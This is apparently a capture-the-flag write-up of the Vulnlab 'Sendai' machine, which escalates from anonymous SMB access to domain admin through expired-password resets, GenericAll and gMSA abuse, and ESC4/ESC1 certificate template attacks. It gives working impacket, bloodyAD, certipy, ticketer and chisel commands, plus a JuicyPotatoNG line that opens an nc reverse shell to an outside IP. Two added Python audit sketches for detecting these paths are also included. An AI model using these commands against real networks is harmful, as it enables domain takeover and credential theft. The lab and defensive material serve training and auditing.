Vulnlab — Sendai

ARZ101
6 min read · May 10, 2024

Sendai involved enumerating usernames through SMB shares, finding accounts whose passwords had expired, and resetting their passwords. One of these users belonged to the Support group, which had GenericAll on the ADMSVC group, which in turn had ReadGMSAPassword on MGTSVC$. Enumerating the system then revealed clifford's password; he was part of the ca-operators group, which had full control over the SendaiComputer template, making it vulnerable to ESC4. Changing the template configuration to make it vulnerable to ESC1 allowed escalating to domain admin.

PORT      STATE SERVICE       VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Supported Methods: GET
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-04T16:24:01
| Not valid after: 2024-11-03T16:24:01
| MD5: 6198fc32527e478294e38fd5c6a2b81e
|_SHA-1: 73b4d1026b49e0cb9c0d633982377e74f32b7db3
|_ssl-date: 2024-05-05T16:28:56+00:00; -1m22s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open unknown
56740/tcp open unknown
56744/tcp open unknown

PORT 80/443

Running gobuster, we find /service.

However, this endpoint shows that we don't have access to it.

PORT 445

Enumerating SMB shares with anonymous login, we see the config, sendai and Users shares. config was not accessible and Users didn't have anything, but sendai had some interesting files.

The incident talked about users having weak passwords and said that all users will be prompted to change their password on logging in. The transfer directory had the users' directories.

Resetting domain user’s password

These users can also be enumerated with lookupsid by brute-forcing SIDs.

On trying to log in with a null password, we get two users whose password has to be changed.

The password can be changed with impacket-smbpasswd:

impacket-smbpasswd  sendai.vl/Thomas.Powell@dc.sendai.vl -newpass '$aduwu123'

From the config share, we can grab .sqlconfig, which has credentials for MSSQL.

But this service isn't exposed to us, so we move on to enumerating the domain with BloodHound:

python3 bloodhound.py -u sqlsvc -p password -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.104.41

Thomas.Powell is a member of the Support group, which has GenericAll on the ADMSVC group, which has ReadGMSAPassword on the MGTSVC$ account. We'll need to add thomas to the ADMSVC group and then read the NT hash of the MGTSVC$ account.

Abusing GenericAll and reading GMSA password

With bloodyAD we can use the GenericAll right to add thomas to the ADMSVC group:

python3 bloodyAD.py  --host "10.10.104.41" -d 'sendai.vl' -u 'thomas.powell' -p '$aduwu123' add groupMember ADMSVC thomas.powell

With the gMSADumper script or with netexec we can dump the NT hash of the mgtsvc account:

python3 gMSADumper.py -u 'thomas.powell' -p '$aduwu123' -d sendai.vl -l 10.10.104.41
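The chain above (group membership, then GenericAll on a group, then ReadGMSAPassword) is what a defender needs to audit: who can effectively read a gMSA password, not only who is listed as a reader. The following is an added example, not code from this write-up or any tool it uses; the directory snapshot is constructed from the names on this page and the data layout is an assumption.

```python
from collections import deque

# Constructed snapshot using the names and rights described in this write-up.
MEMBER_OF = {"thomas.powell": {"Support"}, "clifford.davey": {"CA-Operators"}}
GENERIC_ALL = {"Support": {"ADMSVC"}}      # holder can add members to the target group
GMSA_READERS = {"MGTSVC$": {"ADMSVC"}}     # simplified msDS-GroupMSAMembership


def paths_from(principal, member_of, generic_all):
    """Breadth-first walk: every group the principal is in or can add itself to."""
    paths, queue = {principal: [principal]}, deque([principal])
    while queue:
        node = queue.popleft()
        edges = [("MemberOf", g) for g in sorted(member_of.get(node, ()))]
        edges += [("GenericAll", g) for g in sorted(generic_all.get(node, ()))]
        for label, group in edges:
            if group not in paths:          # first (shortest) path wins
                paths[group] = paths[node] + [f"-{label}->", group]
                queue.append(group)
    return paths


def gmsa_exposure(users, member_of, generic_all, gmsa_readers):
    """Map (gMSA, user) to the shortest chain that lets the user read its password."""
    exposure = {}
    for gmsa, readers in sorted(gmsa_readers.items()):
        for user in users:
            paths = paths_from(user, member_of, generic_all)
            chains = [paths[g] for g in sorted(readers) if g in paths]
            if chains:
                exposure[(gmsa, user)] = " ".join(min(chains, key=len))
    return exposure


if __name__ == "__main__":
    users = ["thomas.powell", "clifford.davey"]
    found = gmsa_exposure(users, MEMBER_OF, GENERIC_ALL, GMSA_READERS)
    for key, chain in found.items():
        print(key, chain)
```

Any user reported here should be treated as holding the service account's credentials, so the fix is to remove the control right on the reader group rather than only reviewing its current members.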

This account can log in on the DC as it's part of the Remote Management group.

Checking the privileges after logging in through evil-winrm, the account doesn't have any privilege that we can abuse to get local admin.

Obtaining clifford’s password

Among the running processes, we have helpdesk, which doesn't normally run on a system.

Enumerating the system with PrivescCheck.ps1

This lists the running processes, where we find clifford.davey's creds.

Enumerating ADCS

This user belongs to the CA-Operators group, so he will likely be able to enroll in a custom template. We enumerate the templates with certipy.

Escalating privileges through ESC4

certipy find -u clifford.davey -vulnerable -target dc.sendai.vl -dc-ip 10.10.115.126 -stdout

This lists a template, SendaiComputer, which has its EKU set to Client Authentication, so its certificates can be used to authenticate on the system. The ca-operators group has Full Control over this template, which means we can edit the template and impersonate the domain admin; this is known as ESC4 (access control) abuse.

With certipy, we can change the configuration of this template to allow domain users to enroll in it and impersonate any user:

certipy template -u clifford.davey -target dc.sendai.vl -dc-ip 10.10.115.126 -template SendaiComputer
certipy req -u 'clifford.davey' -ca 'sendai-DC-CA' -dc-ip 10.10.115.126 -target dc.sendai.vl -template 'SendaiComputer' -upn administrator
certipy auth -pfx ./administrator.pfx -domain sendai.vl
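To show why write access on a template (ESC4) is equivalent to ESC1, here is an added audit sketch, not code from this write-up or from certipy. It evaluates a template described as a dict; the flag bits and EKU OIDs are the standard ones, while the attribute values, the dict layout and the tier-0 list are constructed assumptions.

```python
# Added example: attribute values below are constructed, not read from the lab.
ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag bit
PEND_ALL_REQUESTS = 0x2           # msPKI-Enrollment-Flag bit (manager approval)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
WRITE_RIGHTS = {"FullControl", "WriteDacl", "WriteOwner", "WriteProperty"}
# Principals trusted to manage templates (assumption for this sketch).
TIER0 = {"Domain Admins", "Enterprise Admins", "SYSTEM"}


def audit_template(t, tier0=TIER0):
    """Return sorted finding labels for one template described as a dict."""
    findings = set()
    # ESC4: someone outside tier 0 can rewrite the template object itself.
    for principal, rights in t["acl"].items():
        if principal not in tier0 and WRITE_RIGHTS & set(rights):
            findings.add("ESC4")
    ekus = set(t["ekus"])
    auth_capable = not ekus or bool(ekus & AUTH_EKUS)  # empty EKU list = any use
    low_priv_enroll = any(p not in tier0 for p in t["enroll"])
    # ESC1: requester names the subject, cert works for logon, nothing gates issuance.
    if (t["name_flag"] & ENROLLEE_SUPPLIES_SUBJECT and auth_capable
            and low_priv_enroll
            and not t["enroll_flag"] & PEND_ALL_REQUESTS
            and t["ra_signatures"] == 0):
        findings.add("ESC1")
    return sorted(findings)


# Constructed snapshot of the template before and after a write by a non-tier-0 group.
before = {
    "name": "SendaiComputer", "name_flag": 0x0, "enroll_flag": 0x0,
    "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2"],
    "enroll": ["Domain Computers"],
    "acl": {"Domain Admins": ["FullControl"], "ca-operators": ["FullControl"]},
}
after = dict(before, name_flag=0x1, enroll=["Domain Computers", "Authenticated Users"])

if __name__ == "__main__":
    for label, t in (("before", before), ("after", after)):
        print(label, t["name"], audit_template(t))
```

The "before" snapshot reports only ESC4 and the "after" snapshot reports both, which is why the template ACL has to be restricted to tier-0 principals rather than relying on the current flag values.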

Escalating with SeImpersonate privilege

Another way of escalating privileges is through MSSQL. Since MSSQL is running internally, with access to the machine we can port forward with chisel:

chisel server -p 2222 --reverse
chisel.exe client 10.8.0.136:2222 R:socks

But we get login denied for the sqlsvc account.

With ticketer, we forge a silver ticket to access the MSSQL service as an administrator:

ticketer.py -domain-sid S-1-5-21-3085872742-570972823-736764132 -domain sendai.vl -spn MSSQL/dc.sendai.vl -nthash hash Administrator

Enabling xp_cmdshell allows us to execute system commands as sqlsvc.

The difference here is that we have the SeImpersonate privilege, which we can abuse to get local admin.

Using JuicyPotatoNG to abuse the privilege and get a shell as SYSTEM:

.\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Users\sqlsvc\nc.exe 10.8.0.136 4444 -e cmd.exe"
